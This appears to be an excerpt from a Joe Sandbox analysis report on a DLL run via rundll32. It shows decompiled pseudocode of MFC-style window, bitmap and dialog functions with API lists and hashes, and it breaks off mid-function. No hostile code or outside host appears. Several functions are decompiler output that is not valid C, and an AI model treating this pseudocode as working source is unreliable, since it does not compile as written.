				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10057a08; // 0x4959db98
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000C12A(0);
				_t67 = _t72;
				_t63 = E1000C15E(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000C12A(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

APIs

Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

EnableWindow.USER32(?,00000001), ref: 1000C256
GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
GetCurrentProcessId.KERNEL32 ref: 1000C26E
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 1000C283
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
EnableWindow.USER32(?,00000001), ref: 1000C33C

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C15E, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1000C087();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E1000A7CE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 1000C190
GetParent.USER32(100014EC), ref: 1000C19E
GetParent.USER32(100014EC), ref: 1000C1B1
GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5

Uniqueness

Uniqueness Score: -1.00%

Function 1001411A, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

APIs

ClientToScreen.USER32(?,?), ref: 10014129
GetDlgCtrlID.USER32(00000000), ref: 1001413D
GetWindowLongA.USER32 ref: 1001414B
GetWindowRect.USER32 ref: 1001415D
PtInRect.USER32(?,?,?), ref: 1001416D
GetWindow.USER32(?,00000005), ref: 1001417A

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94

Uniqueness

Uniqueness Score: -1.00%

Function 10012406, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E100174D0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x1005aa70; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

APIs

_memset.LIBCMT ref: 10012434

Strings

@, xrefs: 10012540
AfxMDIFrame80s, xrefs: 100124D5
AfxFrameOrView80s, xrefs: 100124FA
@, xrefs: 100125D9

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100017E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1000C4C7: _memset.LIBCMT ref: 1000C4DE

_strlen.LIBCMT ref: 100018FF
_strlen.LIBCMT ref: 10001971
_strlen.LIBCMT ref: 100019B6
LoadIconA.USER32 ref: 100019FD

Strings

127.0.0.1, xrefs: 100018E8, 100018FA, 1000190E

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1001486F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10057a08; // 0x4959db98
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E100146B2(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E100146DD(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100169F6(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

APIs

GlobalLock.KERNEL32 ref: 10014899
lstrlenA.KERNEL32(?), ref: 100148E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB

Strings

System, xrefs: 10014895

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B3AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B3AF(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10057a08; // 0x4959db98
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10057298;
					E10017C83( &_v172, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, _t38, _t42, _t43);
					_t40 = E10013965(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000CF71(_t40);
					}
					return E10017C60(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1002a144;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x1005aa80 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x1005aa80 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
_memset.LIBCMT ref: 1000B429
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
LoadBitmapA.USER32 ref: 1000B493

Strings

, xrefs: 1000B3E8

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750

Uniqueness

Uniqueness Score: -1.00%

Function 1000D86F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000D6C3() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
